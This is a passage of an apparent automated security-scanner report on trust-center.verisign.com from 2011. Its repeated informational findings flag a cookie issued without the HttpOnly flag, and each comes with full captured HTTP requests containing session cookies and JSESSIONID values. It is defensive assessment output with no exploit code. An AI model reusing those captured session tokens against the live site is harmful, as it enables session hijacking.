Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:25 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 89269
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
   Copyright (c) 2004-2009, The Dojo Foundation All Rights Reserved.
   Available via Academic Free License >= 2.1 OR the modified BSD license.
   see: http://dojotoolkit.org/license for details
*/

/*
   
...[SNIP]...

10.103. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/syscheck.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/syscheck.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1470
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var oVal;var sessionTimerId=0;var SESSIONTIMEOUT=33*60*1000;function checkStatus(val){if(oVal!=val){window.location.reload();}}
function callServer(check,orig){var localHttpObj=getXMLHttpObj();oVal=o
...[SNIP]...

10.104. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/tealeaf/TealeafSDK.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/tealeaf/TealeafSDK.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 57905
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

if(TeaLeaf&&TeaLeaf.Configuration&&TeaLeaf.Configuration.tlinit==false){TeaLeaf.Configuration.tlinit=true;if(!Array.prototype.push){Array.prototype.stackEnd=0;Array.prototype.push=function(a){this[thi
...[SNIP]...

10.105. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 22968
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
* Copyright . 1999-2009 TeaLeaf Technology, Inc.
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS''

...[SNIP]...

10.106. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/trustcenter_capture_payment.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/trustcenter_capture_payment.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4605
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function onPaymentMethodChange(){var paymentMethodObj=getElement("enrollment.payment.paymentMethod");if(paymentMethodObj!==null){var radioLength=paymentMethodObj.length;var index=0;for(var i=0;i<radi
...[SNIP]...

10.107. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/trustcenter_product_selector.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/trustcenter_product_selector.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 19769
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var premiumSupportFee=0;var pciComplianceFee=0;var pricingMatrix=[];var validityObjFive=null;var validityObjFour=null;var validityObjThree=null;var validityObjTwo=null;var validityObjOne=null;var pro
...[SNIP]...

10.108. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/utility.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/utility.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 8013
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var menuItemCurrentlyHasFocus=false;function MM_findObj(n,d){var p,i,x;if(!d){d=document;}
if((p=n.indexOf("?"))>0&&parent.frames.length){d=parent.frames[n.substring(p+1)].document;n=n.substring(0,p)
...[SNIP]...

10.109. https://trust-center.verisign.com/rcm/verisign/style/brand.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/brand.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/brand.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 7437
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

@import "vrsn.css";
#vrsn_standard_bar{background-color:#9B0033;clear:both;color:#FFFFFF;font-size:.8em;height:2em;text-align:center;width:100%;}
#vrsn_standard_bar_footer{border-top:1px solid #EDEDEE
...[SNIP]...

10.110. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/capture_payment.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/capture_payment.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2075
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*import from capture_payment.css - Coakley 10_5_2010 */
.radio_button {width:180px;}
.blurb {padding-left:5px;padding-bottom:10px;}
#tax_exemption_section {margin-left:35px;}
.content_line {    position
...[SNIP]...

10.111. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/minimal_form.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/minimal_form.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3324
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#quick_signin_box {position:relative;top:0px;margin:0px;}
.minimal-form-gray, .minimal-form-gray * {background-color:gray;}
.minimal-form, .minimal-form-gray{border:solid 1px #5C554B;height:auto;t
...[SNIP]...

10.112. https://trust-center.verisign.com/rcm/verisign/style/module.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/module.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/module.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 698
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#ratepointbox{background-color:#FFFFFF;border:1px solid #999999;margin-bottom:10px;padding:1px;width:196px;}
#ratepointbox .header{background-image:url(../images/ratepoint_header_bg.gif);background-po
...[SNIP]...

10.113. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/product_selector.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/product_selector.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9496
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#comparison_chart_panel{position:absolute;right:20px;top:0;}
#product_ssp_ev{background-image:url(../images/SSP_EV.jpg);background-position:top;background-repeat:no-repeat;float:left;margin-bottom:0;
...[SNIP]...

10.114. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/vrsn.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/vrsn.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
